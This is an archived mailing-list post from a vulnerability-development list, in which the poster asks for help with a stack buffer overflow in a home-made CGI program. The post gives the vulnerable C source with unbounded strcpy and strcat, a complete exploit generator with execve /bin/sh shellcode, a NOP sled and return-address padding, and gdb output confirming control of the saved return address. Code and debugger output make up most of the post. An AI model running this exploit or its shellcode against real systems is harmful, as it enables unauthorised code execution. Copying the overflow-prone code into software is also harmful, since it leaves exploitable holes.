Vulnerability Development mailing list archives
Problem exploiting a CGI overflow
From: Víctor Henríquez <vhenriquez () grancanaria com>
Date: Tue, 23 Nov 2004 14:18:11 +0000
Hi, I'm new in this world. I discover several buffer overflow problems in some of our home-made apps. I try to exploit this but I have a rare problem. --- Vuln Code (post2.c) --- #include <stdio.h> #include <string.h> int main() { void split(char *line); char line1[500],line2[500]; strcpy(line2,""); while (!feof(stdin)) { scanf("%s",&line1); strcat(line1," "); strcat(line2,line1); } split(line2); printf("bye\n"); } void split(char *line) { char txt[500]; char *p; strcpy(txt,line); } --- $ cc post2.c -o post.cgi -ggdb $ perl -e 'print "A"x520' | ./post.cgi Violación de segmento (core dumped) $ gdb post.cgi core gdb: Symbol `emacs_ctlx_keymap' has different size in shared object, consider re-linking Core was generated by `./post.cgi'. Program terminated with signal 11, Segmentation fault. Reading symbols from /lib/libc.so.6...done. Loaded symbols for /lib/libc.so.6 Reading symbols from /lib/ld-linux.so.2...done. Loaded symbols for /lib/ld-linux.so.2 #0 0x41414141 in ?? () Well... I'm trying overflow the strcpy() in split(). --- exploit code --- #include <stdlib.h> #include <stdio.h> #define DEFAULT_ADDRESS 0xbffff4d4 #define DEFAULT_OFFSET 0 #define DEFAULT_BUFFER_SIZE 520 #define NOP 0x90 char shellcode[] = "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" "\x80\xe8\xdc\xff\xff\xff/bin/sh"; int main(int argc, char *argv[]) { char *buff, *ptr; long *addr_ptr, addr; int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE; int i; FILE *out; if (argc > 1) bsize = atoi(argv[1]); if (argc > 2) offset = atoi(argv[2]); if (!(buff = malloc(bsize))) { printf("Can't allocate memory.\n"); exit(0); } addr = DEFAULT_ADDRESS + offset; printf("Using address: 0x%x\n", addr); ptr = buff; addr_ptr = (long *) ptr; for (i = 0; i < bsize; i+=4) *(addr_ptr++) = addr; for (i = 0; i < bsize/2; i++) buff[i] = NOP; ptr = buff + ((bsize/2) - (strlen(shellcode)/2)); for (i = 0; i < strlen(shellcode); i++) *(ptr++) = shellcode[i]; buff[bsize - 1] = '\0'; if ((out = fopen("buffer", "w")) == NULL) { perror("fopen"); exit(-1); } fprintf(out, "%s", buff); fclose(out); return 1; } --- Now the problem... $ echo "AAA" | ./post.cgi bye $ cc exploit.c -o exp $ ./exp Using address: 0xbffff4d4 $ cat buffer | ./post.cgi Really he execute other code, but not the shellcode. More GDB now... $ gdb post.cgi (gdb) r < buffer Starting program: /home/victor/laboratory/gsi/post-dev/post.cgi < buffer Breakpoint 1, split (line=0xbffff6e0 '\220' <repeats 200 times>...) at post2.c: 21 21 strcpy(txt,line); (gdb) info f Stack level 0, frame at 0xbffff6b8: eip = 0x804859d in split (post2.c:21); saved eip 0x804857f called by frame at 0xbffffac8 source language c. Arglist at 0xbffff6b8, args: line=0xbffff6e0 '\220' <repeats 200 times>... Locals at 0xbffff6b8, Previous frame's sp is 0x0 Saved registers: ebp at 0xbffff6b8, eip at 0xbffff6bc (gdb) x 0xbffff6bc 0xbffff6bc: 0x0804857f (gdb) n 22 } (gdb) x 0xbffff6bc 0xbffff6bc: 0xbffff4d4 // Ret Changed!! (gdb) x/100 0xbffff4d4 0xbffff4d4: 0x90909090 0x90909090 0x90909090 0x90909090 0xbffff4e4: 0x90909090 0x90909090 0x90909090 0x90909090 0xbffff4f4: 0x90909090 0x90909090 0x90909090 0x90909090 0xbffff504: 0x90909090 0x90909090 0x90909090 0x90909090 0xbffff514: 0x90909090 0x90909090 0x90909090 0x90909090 0xbffff524: 0x90909090 0x90909090 0x90909090 0x90909090 0xbffff534: 0x90909090 0x90909090 0x90909090 0x90909090 0xbffff544: 0x90909090 0x90909090 0x90909090 0x90909090 0xbffff554: 0x90909090 0x90909090 0x90909090 0x90909090 0xbffff564: 0x90909090 0x90909090 0x90909090 0x90909090 0xbffff574: 0x90909090 0x90909090 0x90909090 0x90909090 0xbffff584: 0x90909090 0x90909090 0x90909090 0x90909090 0xbffff594: 0x90909090 0x90909090 0x90909090 0x90909090 0xbffff5a4: 0x90909090 0x90909090 0x90909090 0x1feb9090 0xbffff5b4: 0x0876895e 0x4688c031 0x20468907 0xf38920b0 0xbffff5c4: 0x8d084e8d 0x80cd2056 0xd889db31 0xe880cd40 0xbffff5d4: 0xffffffdc 0x6e69622f 0xbf68732f 0xbffff4d4 0xbffff5e4: 0xbffff4d4 0xbffff4d4 0xbffff4d4 0xbffff4d4 0xbffff5f4: 0xbffff4d4 0xbffff4d4 0xbffff4d4 0xbffff4d4 // Shellcode is in position... (gdb) n Program exited normally. What's happen!? I discover that the shellcode change during his execution. Yeah, some bytes of the shellcode change while is running. Why?? How can avoid this? Thanks in advance -- Víctor Henríquez ------------------------------------------------- Este email ha sido enviado a través de http://www.grancanaria.com
Current thread:
- Problem exploiting a CGI overflow Víctor Henríquez (Nov 23)
- Re: Problem exploiting a CGI overflow sin (Nov 23)
- Re: Problem exploiting a CGI overflow Víctor Henríquez (Nov 24)
- Re: Problem exploiting a CGI overflow sin (Nov 24)
- Re: Problem exploiting a CGI overflow Vlad902 (Nov 27)
- Re: Problem exploiting a CGI overflow Víctor Henríquez (Nov 24)
- Re: Problem exploiting a CGI overflow Víctor Henríquez (Nov 28)
- Re: Problem exploiting a CGI overflow sin (Nov 29)
- <Possible follow-ups>
- Re: Problem exploiting a CGI overflow Marco Ivaldi (Nov 24)
- Re: Problem exploiting a CGI overflow sin (Nov 28)
- Re: Problem exploiting a CGI overflow Marco Ivaldi (Nov 28)
- Re: Problem exploiting a CGI overflow sin (Nov 23)